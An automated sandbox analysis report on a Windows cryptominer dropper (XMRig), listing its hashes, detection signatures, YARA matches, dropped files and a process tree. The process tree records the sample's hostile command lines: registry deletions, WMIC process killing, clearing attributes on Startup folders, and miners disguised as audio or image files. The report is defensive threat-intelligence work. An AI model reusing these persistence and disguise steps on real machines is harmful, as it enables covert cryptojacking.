Edit tour

Windows Analysis Report
K4gsPJGEi4.exe

Overview

General Information

Sample name:	K4gsPJGEi4.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:	a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
Analysis ID:	1467765
MD5:	997f25415b30c6da407a75c55806d752
SHA1:	5efadd4bfb032e773492a42c391b3be12eabbe98
SHA256:	a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected Powershell download and execute

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Command shell drops VBS files

Drops PE files to the user root directory

Found strings related to Crypto-Mining

Machine Learning detection for dropped file

Machine Learning detection for sample

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Sample is not signed and drops a device driver

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Uses cmd line tools excessively to alter registry or file data

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates driver files

Creates files inside the system directory

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May infect USB drives

May use bcdedit to modify the Windows boot settings

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara detected NirCmd tool

Yara signature match

Classification

Process Tree

System is w10x64

K4gsPJGEi4.exe (PID: 3652 cmdline: "C:\Users\user\Desktop\K4gsPJGEi4.exe" MD5: 997F25415B30C6DA407A75C55806D752)

cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5492 cmdline: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4844 cmdline: C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

find.exe (PID: 7060 cmdline: C:\Windows\System32\find.exe "0x0" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

wscript.exe (PID: 5312 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 5952 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 1248 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 6164 cmdline: C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wscript.exe (PID: 5576 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4296 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

screen.exe (PID: 6668 cmdline: "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2" MD5: A1CD6A64E8F8AD5D4B6C07DC4113C7EC)

cmd.exe (PID: 1992 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 5780 cmdline: C:\Windows\System32\findstr.exe /i /c:"Local" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 408 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 4824 cmdline: C:\Windows\System32\findstr.exe /i /c:"'" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

screen.exe (PID: 4128 cmdline: "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2" MD5: A1CD6A64E8F8AD5D4B6C07DC4113C7EC)

timeout.exe (PID: 2000 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 2780 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 4676 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

reg.exe (PID: 4324 cmdline: C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

attrib.exe (PID: 6484 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

attrib.exe (PID: 6096 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

reg.exe (PID: 6416 cmdline: C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4072 cmdline: C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5168 cmdline: C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3408 cmdline: C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

WMIC.exe (PID: 5700 cmdline: C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 3576 cmdline: findstr /i /c:"RtkAudio" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7044 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

WMIC.exe (PID: 1992 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

WMIC.exe (PID: 408 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

WMIC.exe (PID: 6604 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

Conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7128 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

WMIC.exe (PID: 5800 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

WMIC.exe (PID: 4432 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

WMIC.exe (PID: 5684 cmdline: C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate MD5: E2DE6500DE1148C7F6027AD50AC8B891)

attrib.exe (PID: 3288 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

attrib.exe (PID: 6132 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

attrib.exe (PID: 5740 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

attrib.exe (PID: 6252 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

attrib.exe (PID: 728 cmdline: C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

timeout.exe (PID: 5580 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7124 cmdline: C:\Windows\System32\timeout.exe /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

chcp.com (PID: 1576 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
K4gsPJGEi4.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
K4gsPJGEi4.exe	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x5ecf78:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
K4gsPJGEi4.exe	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xac6289:$a1: mining.set_target 0xab802a:$a2: XMRIG_HOSTNAME 0xabac38:$a3: Usage: xmrig [OPTIONS] 0xab8004:$a4: XMRIG_VERSION
K4gsPJGEi4.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xb0fa28:$x1: donate.ssl.xmrig.com 0xb0fef9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0xba0f23:$s2: \\?\pipe\uv\%p-%lu
K4gsPJGEi4.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0xb110a8:$s1: %s/%s (Windows NT %lu.%lu 0xb15728:$s3: \\.\WinRing0_ 0xabcca2:$s4: pool_wallet 0xab74d0:$s5: cryptonight 0xab74de:$s5: cryptonight 0xab74ed:$s5: cryptonight 0xab74fb:$s5: cryptonight 0xab7510:$s5: cryptonight 0xab751f:$s5: cryptonight 0xab752d:$s5: cryptonight 0xab7542:$s5: cryptonight 0xab7551:$s5: cryptonight 0xab7562:$s5: cryptonight 0xab7579:$s5: cryptonight 0xab7587:$s5: cryptonight 0xab7595:$s5: cryptonight 0xab75a5:$s5: cryptonight 0xab75b7:$s5: cryptonight 0xab75c8:$s5: cryptonight 0xab75d8:$s5: cryptonight 0xab75e8:$s5: cryptonight

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Start.cmd	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\Start.cmd	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\two.cmd	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\two.cmd	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60bf29:$a1: mining.set_target 0x5fdcca:$a2: XMRIG_HOSTNAME 0x6008d8:$a3: Usage: xmrig [OPTIONS] 0x5fdca4:$a4: XMRIG_VERSION
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x6556c8:$x1: donate.ssl.xmrig.com 0x655b99:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6e6bc3:$s2: \\?\pipe\uv\%p-%lu
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x656d48:$s1: %s/%s (Windows NT %lu.%lu 0x65b3c8:$s3: \\.\WinRing0_ 0x602942:$s4: pool_wallet 0x5fd170:$s5: cryptonight 0x5fd17e:$s5: cryptonight 0x5fd18d:$s5: cryptonight 0x5fd19b:$s5: cryptonight 0x5fd1b0:$s5: cryptonight 0x5fd1bf:$s5: cryptonight 0x5fd1cd:$s5: cryptonight 0x5fd1e2:$s5: cryptonight 0x5fd1f1:$s5: cryptonight 0x5fd202:$s5: cryptonight 0x5fd219:$s5: cryptonight 0x5fd227:$s5: cryptonight 0x5fd235:$s5: cryptonight 0x5fd245:$s5: cryptonight 0x5fd257:$s5: cryptonight 0x5fd268:$s5: cryptonight 0x5fd278:$s5: cryptonight 0x5fd288:$s5: cryptonight
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60bf29:$a1: mining.set_target 0x5fdcca:$a2: XMRIG_HOSTNAME 0x6008d8:$a3: Usage: xmrig [OPTIONS] 0x5fdca4:$a4: XMRIG_VERSION
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x6556c8:$x1: donate.ssl.xmrig.com 0x655b99:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6e6bc3:$s2: \\?\pipe\uv\%p-%lu
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x656d48:$s1: %s/%s (Windows NT %lu.%lu 0x65b3c8:$s3: \\.\WinRing0_ 0x602942:$s4: pool_wallet 0x5fd170:$s5: cryptonight 0x5fd17e:$s5: cryptonight 0x5fd18d:$s5: cryptonight 0x5fd19b:$s5: cryptonight 0x5fd1b0:$s5: cryptonight 0x5fd1bf:$s5: cryptonight 0x5fd1cd:$s5: cryptonight 0x5fd1e2:$s5: cryptonight 0x5fd1f1:$s5: cryptonight 0x5fd202:$s5: cryptonight 0x5fd219:$s5: cryptonight 0x5fd227:$s5: cryptonight 0x5fd235:$s5: cryptonight 0x5fd245:$s5: cryptonight 0x5fd257:$s5: cryptonight 0x5fd268:$s5: cryptonight 0x5fd278:$s5: cryptonight 0x5fd288:$s5: cryptonight
C:\Windows\SysWOW64\en\Au.avi	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\SysWOW64\en\Au.avi	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Windows\SysWOW64\en\Au.avi	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60bf29:$a1: mining.set_target 0x5fdcca:$a2: XMRIG_HOSTNAME 0x6008d8:$a3: Usage: xmrig [OPTIONS] 0x5fdca4:$a4: XMRIG_VERSION
C:\Windows\SysWOW64\en\Au.avi	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x6556c8:$x1: donate.ssl.xmrig.com 0x655b99:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6e6bc3:$s2: \\?\pipe\uv\%p-%lu
C:\Windows\SysWOW64\en\Au.avi	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x656d48:$s1: %s/%s (Windows NT %lu.%lu 0x65b3c8:$s3: \\.\WinRing0_ 0x602942:$s4: pool_wallet 0x5fd170:$s5: cryptonight 0x5fd17e:$s5: cryptonight 0x5fd18d:$s5: cryptonight 0x5fd19b:$s5: cryptonight 0x5fd1b0:$s5: cryptonight 0x5fd1bf:$s5: cryptonight 0x5fd1cd:$s5: cryptonight 0x5fd1e2:$s5: cryptonight 0x5fd1f1:$s5: cryptonight 0x5fd202:$s5: cryptonight 0x5fd219:$s5: cryptonight 0x5fd227:$s5: cryptonight 0x5fd235:$s5: cryptonight 0x5fd245:$s5: cryptonight 0x5fd257:$s5: cryptonight 0x5fd268:$s5: cryptonight 0x5fd278:$s5: cryptonight 0x5fd288:$s5: cryptonight
C:\Users\Public\RtkAudio.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\Public\RtkAudio.exe	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Users\Public\RtkAudio.exe	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60bf29:$a1: mining.set_target 0x5fdcca:$a2: XMRIG_HOSTNAME 0x6008d8:$a3: Usage: xmrig [OPTIONS] 0x5fdca4:$a4: XMRIG_VERSION
C:\Users\Public\RtkAudio.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x6556c8:$x1: donate.ssl.xmrig.com 0x655b99:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6e6bc3:$s2: \\?\pipe\uv\%p-%lu
C:\Users\Public\RtkAudio.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x656d48:$s1: %s/%s (Windows NT %lu.%lu 0x65b3c8:$s3: \\.\WinRing0_ 0x602942:$s4: pool_wallet 0x5fd170:$s5: cryptonight 0x5fd17e:$s5: cryptonight 0x5fd18d:$s5: cryptonight 0x5fd19b:$s5: cryptonight 0x5fd1b0:$s5: cryptonight 0x5fd1bf:$s5: cryptonight 0x5fd1cd:$s5: cryptonight 0x5fd1e2:$s5: cryptonight 0x5fd1f1:$s5: cryptonight 0x5fd202:$s5: cryptonight 0x5fd219:$s5: cryptonight 0x5fd227:$s5: cryptonight 0x5fd235:$s5: cryptonight 0x5fd245:$s5: cryptonight 0x5fd257:$s5: cryptonight 0x5fd268:$s5: cryptonight 0x5fd278:$s5: cryptonight 0x5fd288:$s5: cryptonight
C:\Users\Public\RtkAudio.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\Public\RtkAudio.exe	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Users\Public\RtkAudio.exe	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60bf29:$a1: mining.set_target 0x5fdcca:$a2: XMRIG_HOSTNAME 0x6008d8:$a3: Usage: xmrig [OPTIONS] 0x5fdca4:$a4: XMRIG_VERSION
C:\Users\Public\RtkAudio.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x6556c8:$x1: donate.ssl.xmrig.com 0x655b99:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6e6bc3:$s2: \\?\pipe\uv\%p-%lu
C:\Users\Public\RtkAudio.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x656d48:$s1: %s/%s (Windows NT %lu.%lu 0x65b3c8:$s3: \\.\WinRing0_ 0x602942:$s4: pool_wallet 0x5fd170:$s5: cryptonight 0x5fd17e:$s5: cryptonight 0x5fd18d:$s5: cryptonight 0x5fd19b:$s5: cryptonight 0x5fd1b0:$s5: cryptonight 0x5fd1bf:$s5: cryptonight 0x5fd1cd:$s5: cryptonight 0x5fd1e2:$s5: cryptonight 0x5fd1f1:$s5: cryptonight 0x5fd202:$s5: cryptonight 0x5fd219:$s5: cryptonight 0x5fd227:$s5: cryptonight 0x5fd235:$s5: cryptonight 0x5fd245:$s5: cryptonight 0x5fd257:$s5: cryptonight 0x5fd268:$s5: cryptonight 0x5fd278:$s5: cryptonight 0x5fd288:$s5: cryptonight
C:\Users\Public\RtkAudio.exe	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\Public\RtkAudio.exe	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
C:\Users\Public\RtkAudio.exe	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60bf29:$a1: mining.set_target 0x5fdcca:$a2: XMRIG_HOSTNAME 0x6008d8:$a3: Usage: xmrig [OPTIONS] 0x5fdca4:$a4: XMRIG_VERSION
C:\Users\Public\RtkAudio.exe	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x6556c8:$x1: donate.ssl.xmrig.com 0x655b99:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6e6bc3:$s2: \\?\pipe\uv\%p-%lu
C:\Users\Public\RtkAudio.exe	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x656d48:$s1: %s/%s (Windows NT %lu.%lu 0x65b3c8:$s3: \\.\WinRing0_ 0x602942:$s4: pool_wallet 0x5fd170:$s5: cryptonight 0x5fd17e:$s5: cryptonight 0x5fd18d:$s5: cryptonight 0x5fd19b:$s5: cryptonight 0x5fd1b0:$s5: cryptonight 0x5fd1bf:$s5: cryptonight 0x5fd1cd:$s5: cryptonight 0x5fd1e2:$s5: cryptonight 0x5fd1f1:$s5: cryptonight 0x5fd202:$s5: cryptonight 0x5fd219:$s5: cryptonight 0x5fd227:$s5: cryptonight 0x5fd235:$s5: cryptonight 0x5fd245:$s5: cryptonight 0x5fd257:$s5: cryptonight 0x5fd268:$s5: cryptonight 0x5fd278:$s5: cryptonight 0x5fd288:$s5: cryptonight
Click to see the 29 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_NirCmd	Yara detected NirCmd tool	Joe Security
00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xff35:$a1: mining.set_target 0x1cd6:$a2: XMRIG_HOSTNAME 0x48e4:$a3: Usage: xmrig [OPTIONS] 0x1cb0:$a4: XMRIG_VERSION
00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_NirCmd	Yara detected NirCmd tool	Joe Security
00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x12c89:$a1: mining.set_target 0x4a2a:$a2: XMRIG_HOSTNAME 0x7638:$a3: Usage: xmrig [OPTIONS] 0x4a04:$a4: XMRIG_VERSION
00000000.00000003.2159430929.0000000002EA0000.00000004.00001000.00020000.00000000.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c24:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x269978:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
Process Memory Space: K4gsPJGEi4.exe PID: 3652	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: K4gsPJGEi4.exe PID: 3652	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: K4gsPJGEi4.exe PID: 3652	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x20f5a1:$a1: mining.set_target 0x2fccaa:$a1: mining.set_target 0x209c6a:$a2: XMRIG_HOSTNAME 0x2f7373:$a2: XMRIG_HOSTNAME 0x20c219:$a3: Usage: xmrig [OPTIONS] 0x2f9922:$a3: Usage: xmrig [OPTIONS] 0x209c44:$a4: XMRIG_VERSION 0x2f734d:$a4: XMRIG_VERSION
Process Memory Space: screen.exe PID: 6668	JoeSecurity_NirCmd	Yara detected NirCmd tool	Joe Security
Process Memory Space: screen.exe PID: 4128	JoeSecurity_NirCmd	Yara detected NirCmd tool	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.screen.exe.400000.0.unpack	JoeSecurity_NirCmd	Yara detected NirCmd tool	Joe Security
23.2.screen.exe.400000.0.unpack	JoeSecurity_NirCmd	Yara detected NirCmd tool	Joe Security
